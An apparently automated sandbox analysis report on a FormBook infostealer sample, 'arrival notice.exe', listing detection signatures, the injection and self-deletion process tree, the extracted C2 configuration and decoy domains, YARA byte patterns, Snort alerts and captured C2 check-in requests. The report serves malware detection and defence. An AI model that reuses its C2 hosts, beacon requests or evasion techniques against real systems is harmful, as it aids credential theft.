Windows Analysis Report arrival notice.exe

Overview

General Information

Sample Name: arrival notice.exe
Analysis ID: 483574
MD5: 692c22c9579ce47100a87e90f911b202
SHA1: 29189325967d4716883edabb4c03a5a30d836896
SHA256: 3f383c683795d277510e0fb4c806ae17bfb33dd6ff875b66c159068e58c28818
Tags: exe, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • arrival notice.exe (PID: 6224 cmdline: 'C:\Users\user\Desktop\arrival notice.exe' MD5: 692C22C9579CE47100A87E90F911B202)
    • arrival notice.exe (PID: 6400 cmdline: C:\Users\user\Desktop\arrival notice.exe MD5: 692C22C9579CE47100A87E90F911B202)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6788 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 6256 cmdline: /c del 'C:\Users\user\Desktop\arrival notice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nordicbatterybelt.net/n58i/"], "decoy": ["southerncircumstance.com", "mcsasco.com", "ifbrick.com", "societe-anonyme.net", "bantank.xyz", "dogecoin.beauty", "aboutacoffee.com", "babalandlordrealestate.com", "tintgta.com", "integrity.directory", "parwnr.icu", "poltishof.online", "stayandstyle.com", "ickjeame.xyz", "currentmotors.ca", "pond.fund", "petrosterzis.com", "deadbydaylightpoints.com", "hotel-balzac.paris", "focusmaintainance.com", "odeonmarket.com", "voeran.net", "lookailpop.xyz", "sashaignatenko.com", "royalgreenvillage.com", "airbhouse.com", "zl-dz.com", "fuwuxz.com", "wugupihuhepop.xyz", "zmdhysm.com", "luchin.site", "rnchaincvkbip.xyz", "fffddfrfqffrtgthhhbhffgfr.com", "goabbasoon.info", "booyahbucks.com", "ilovecoventry.com", "components-electronics.com", "advindustry.com", "browandline.com", "hotnspicy.site", "marlonj26.com", "holidays24.net", "starworks.online", "mbchaindogbbc.xyz", "3wouqg.com", "evnfreesx.com", "baureihe51.com", "hycelassetmanagement.space", "photostickomni-trendyfinds.com", "singisa4letterword.com", "thklw.online", "menramen.com", "highspeedinternetinc.com", "beerenhunger.info", "hisensor.world", "lassurancevalence.com", "clementchanlab.com", "customia.xyz", "alysvera-centroestetico.com", "cx-xiezuo.com", "index-mp3.com", "mybenefits51.com", "vyhozoi.site", "lingerista.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x80ba8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x80f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa89c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8cc55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xb4a75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x8c741:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xb4561:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x8cd57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xb4b77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x8cecf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xb4cef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x8195a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xa977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x8b9bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb37dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x826d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xaa4f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x92147:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb9f67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x931ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(21 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.arrival notice.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.arrival notice.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.arrival notice.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
3.2.arrival notice.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.arrival notice.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE entry not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook (configuration identical to the Malware Configuration section above)
Yara detected FormBook
Source: Yara match File source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 3.2.arrival notice.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: arrival notice.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: arrival notice.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: colorcpl.pdbGCTL source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
Source: Binary string: colorcpl.pdb source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe, 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe
Source: C:\Users\user\Desktop\arrival notice.exe Code function: 4x nop then pop edi 3_2_0041625A
Source: C:\Users\user\Desktop\arrival notice.exe Code function: 4x nop then pop edi 3_2_0040C3D2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop edi 10_2_0097625A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop edi 10_2_0096C3D2

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.beerenhunger.info
Source: C:\Windows\explorer.exe Domain query: www.ilovecoventry.com
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe Domain query: www.mybenefits51.com
Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80
Source: C:\Windows\explorer.exe Domain query: www.singisa4letterword.com
Source: C:\Windows\explorer.exe Domain query: www.petrosterzis.com
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.150 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.nordicbatterybelt.net/n58i/
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: global traffic HTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1 Host: www.ilovecoventry.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1 Host: www.ilovecoventry.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== HTTP/1.1 Host: www.beerenhunger.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn HTTP/1.1 Host: www.singisa4letterword.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 198.185.159.144
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 601 Connection: close Date: Wed, 15 Sep 2021 07:24:30 GMT Server: Apache Data Raw: (601-byte hex dump omitted; the decoded body follows)
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.403044652.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: arrival notice.exe, 00000001.00000002.380922873.0000000000DD7000.00000004.00000040.sdmp String found in binary or memory: http://www.fontbureau.come.com
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: arrival notice.exe, 00000001.00000003.354453209.0000000000DDC000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comm
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: colorcpl.exe, 0000000A.00000002.618757124.00000000051D2000.00000004.00020000.sdmp String found in binary or memory: https://www.aboutacoffee.com/n58i/?jrU4NBtp=iErxmr1uZwtSCCPIrNfUjuIgI02QQ4hyHDBIFJ5frhw4ANpZ5EdrzBW9
Source: unknown DNS traffic detected: queries for: www.petrosterzis.com
Source: global traffic HTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1 Host: www.ilovecoventry.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1 Host: www.ilovecoventry.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== HTTP/1.1 Host: www.beerenhunger.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn HTTP/1.1 Host: www.singisa4letterword.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: arrival notice.exe
          .NET source code contains very large strings
          Source: arrival notice.exe, Form1.cs | Long String: Length: 38272
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.cs | Long String: Length: 38272
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.cs | Long String: Length: 38272
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.cs | Long String: Length: 38272
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.cs | Long String: Length: 38272
          Source: arrival notice.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
